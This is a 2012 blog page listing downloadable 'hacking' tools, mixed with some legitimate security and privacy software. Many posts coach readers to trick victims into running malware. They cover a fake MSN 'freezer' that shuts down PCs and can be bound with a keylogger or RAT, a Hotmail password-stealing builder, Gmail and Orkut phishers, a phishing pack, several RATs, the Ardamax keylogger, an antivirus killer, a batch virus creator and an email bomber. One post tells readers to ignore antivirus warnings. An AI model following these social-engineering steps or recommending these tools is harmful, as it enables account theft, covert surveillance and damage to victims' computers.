Friday 19 October 2012

HACK ACCOUNT : MSN HACKER






HACK MSN ACCOUNT:


This Softwares floods the victims IM conversation with characters you type. You can optionally choose from currently open windows and spam any of them.

Download

Or

Here

Thursday 18 October 2012

fake msn freezer : msn hacker




This program do not freeze MSN accounts but you can use it to play pranks on your friends. You can send it to your friend telling him that it freezes people's MSN accounts. When he/she will double-click it, it will shutdown their PC within 30 seconds. You can also bind some keylogger or RAT to it with a binder and crypt it with a crypter if you really want to hack them. Enjoy!

Download

Or

Here

Im Spammer :Msn Hacker






This software can spam the MSN  with the characters you type. Type the message in the box to spam and click Spam and see the live ruin showing. It will send unlimited messages until you hit Stop. When I tested this on my computer, it caused my PC to hang and ultimately, I had to restart my system. Enjoy !

Download

Or

Here

Tuesday 9 October 2012

HACK HOTMAIL ACCOUNTS: Msn Hacker




I had posted already Gmail Hacker to hack Gmail accounts.With this software we can hack hotmail accounts.
  • Run Hotmail Hacker Builder.exe file on ur pc.
  • Enter your email address  password and subject of email you want to receive
  • Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
  • Now, send this Hotmail Hacker.exe file to victim of which you want to hack Hotmail password and convince him that this program can hack anyone's Hotmail passwords.
  • Say him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he want to hack. As he enters this information and hits Login and Start he will receive a error message.
  • You will receive an email in your account containing his password. Hurrah! you will now be able to hack hotmail password.   
Download

Or

Herer

Saturday 6 October 2012

KILL TASKS ON VICTIM COMPUTER : AV KILLER







avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security  tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.

Download

Or

Here

FAKE ERROR MESSAGE GENERATOR : MESSAGE MANAGER






Message Manager is a software which show fake error message when it is told to do. You just have to input the txt to be displayed in the error messages and it will display unlimited no. of fake and duplicate error messages.

Download

or

Here

HACK PASSWORDS : USB THIEF


usb thief is a collection of small softwares n programs which can stole password locally stored on a pc. Just unpack the .rar file into the root drive of your USB and plug the USB onto that pc on which you want to hack password.

Download

Or
Here

SWISS ARMY KNIFE



Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.

Download

Or

Here

SMAC : THE MAC ADDRESS CHANGER


SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.

  •     Automatically Activate MAC Address after changing
  •     display the manufacturer of the MAC Address
  •     Generate any New MAC Address based on a selected manufacturer
  •     Preload MAC Addresses List n choose the new MAC address from the list.
  •     IPConfig button click to display network adapter  info to confirm changes
  •     Userfriendly GUI
Download

INVISIBLE SECRETS

By this program, you will be able to encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can decrypt the file if he has this software and knows the encryption password

  • Delete carrier file after process
  • Add fake files to play pranks on friends 
  • Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images
Download

Or

 Here


Tuesday 2 October 2012

WIRESHARK: SNIFFER


Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download

TCP DUMP: SNIFFER


Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download

HACKING GMAIL ACCOUNTS :PHISING


Gmail phisher is a phisher  for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.

Download

Or

Here

HACKING ORKUT ACCOUNTS :PHISING



Orkut Phisher is a phisher for hacking Orkut accounts like Gmail Phising. Just send it to anyone and say him to enter login details. Once he enters his login details, a text file containing passwords of the user is generated automatically.

Download

Or

Here

PHISHER CREATOR





Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.Here is tutorial for Gmail and Orkut Phising

Download

OR

Here

HACK EMAIL ACCOUNTS : 34 IN 1 PHISHER PACK



As the name says, this phisher pack consists of 34 ready made phishing pages of websites like paypal, ebay, yahoo, gmail etc.

Download

Or

Here

HACK COMPUTERS REMOTELY : PRORAT





PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect victim's PC in different ways. Just create the server and send it to the victim.

Download

REVENGER REMOTE VICTIM PC


Revenger is a simple advanced remote administration tool RAT which is used to access and control pcs remotely . It uses clientserver method for remote control and administration of pcs.create the server n send  to  victim and you can track and control every activity of the remote users.

Download

Or

Here

HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4



Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling  the victim computer in many ways.

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected.

Download

Or

Here

BATCH TO EXE CONVERTER




Batch to exe converter is a software to convert batch .bat files to executable .exe files. It consists of manyoptions such as including any other file, adding an icon to the file before compilation.


Download

OR

Here

SONIC BAT - THE BATCH FILE VIRUS CREATOR







This program creates batch .bat viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download

Or

Here

Sunday 30 September 2012

SANDBOXIE


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.


The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk no sandbox shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Download Here

DEEP FREEZE: PROTECT YOUR COMPUTER







Like Sandboxie Deep Freeze helps eliminate computer damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer — regardless of whether they are accidental or malicious — are never permanent. Deep Freeze provides immediate immunity from many of the problems that plague computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation. Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.

Download Here

VULNERABILITY ASSESSMENT TOOL : RETINA


Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.

Download here

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT







The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.

Download Here

VULNERABILITY ASSESSMENT TOOL : NESSUS






Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Download Here


KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. 

Download Here

AIRCRACK






Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Download Here

AIRSNORT




 AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and WPA passwords, AirSnort has a limitation to cracking only WEP passwords.

Download Here

GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features:

    Encrypts your Internet connection
    Erases all traces of your Web surfing
    Removes aggressive spyware
    Prevents identity theft and credit card fraud
    Secures confidential files
    Eliminates online ads

Also includes Spycatcher which is an excellent anti-spyware.


Download here

IP ANONYMIZER



IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.


Download:

HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use. 

Download here: 

ANONYMOUS SURFING : TOR

Tor is a very good and free anonymizer program which hides our IP address and protects our privacy. Tor prevents websites from tracking us. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It is also available as an firefox addon.


PROXY FINDER












Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

Download

Or

Here






PASSLIST GENERATOR FOR BRUTE



This program generates random password lists for bruteforcing. It generates the passwords at a lightning speed. But as you know, longer the password, little more time it will take. It has a simple interface which asks two simple questions. You just have to answer them and this program will generate the password list in password.txt file in the same directory so that you can use it in a program like Bruteforcer, Brutus etc for bruteforce attack.

Download Here

Or

Here

WINDOWS PASSWORD RECOVERY TOOL


SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:

  • Brute-force attack
  • Distributed attack 
  • Mask attack 
  • Dictionary attack 
  • Hybrid attack 
  • Pre-calculated tables attack 
 It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.


Download Here

Or

Here

Saturday 29 September 2012

Havij Advanced SQL Injection


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users

Download Here

Or

Here

Admin Login Finder


Using the ALF you can find login pages very fast. It tests about 2 urls every second, and does 200 links in less than a minute. Of course it also depends on your internet speed.



Download

Or

Here

Friday 28 September 2012

RapidShare Account Generator, Generate Unlimited Accounts











RapidShare is a website designed to host digital files so other people can download them to their computers. The website calls itself the "Anti-Waiting Company," and when you sign up for their premium service you can get immediate access to downloads. If you don't want to pay for a RapidShare premium account, however, you can still use RapidShare to download files, it just takes a bit longer.

Download

Or

Here

Email address harvesting


The simplest method involves spammers purchasing or trading lists of email addresses from other spammers.
Another common method is the use of special software known as "harvesting bots" or "harvesters", which spider Web pages, postings on Usenet, mailing list archives, internet forums and other online sources to obtain email addresses from public data.
Spammers may also use a form of dictionary attack in order to harvest email addresses, known as a directory harvest attack, where valid email addresses at a specific domain are found by guessing email address using common usernames in email addresses at that domain. For example, trying alan@example.com, alana@example.com, alanb@example.com, etc. and any that are accepted for delivery by the recipient email server, instead of rejected, are added to the list of theoretically valid email addresses for that domain.

Download

Light Email Bomber


  An email bomb is a form of net abuse consisting of sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted in a denial of service attack



Mass mailing consists of sending numerous duplicate mails to the same email address. These types of mail bombs are simple to design but their extreme simplicity means they can be easily detected by spam filters. Email-bombing using mass mailing is also commonly performed as a DDoS attack by employing the use of "zombie"  hierarchical networks of computers compromised by malware and under the attacker's control.

Download

or

Here

Password Generator, Generate Every Type Of Passwords



by this tool you can Genrate upper case , lower case and numeric passwords Generate Every Type Of Passwords unlimited

Download

Or

Here

Thursday 27 September 2012

Facebook like Bot Increase your facbook likes



Its is facbook like tool by this you can unlimited likes on your facebook


you can  Download Here 

Or

Here

Wednesday 26 September 2012

How To Hack a Remote Computer Using Ardamax Keylogger




Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.

Here is tutorial for setup
Tutorial

For Download
Download Here

or

Here

Magic PS v1.5 SE FINAL- Hack Password Yahoo ID or Messenger


Magic PS v1.5 SE FINAL is a free tool to hack any Yahoo mail ID or Yahoo Messenger password. You can use it to get password for any yahoo or messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo!.


or

Tuesday 25 September 2012

CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords




CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not.


Download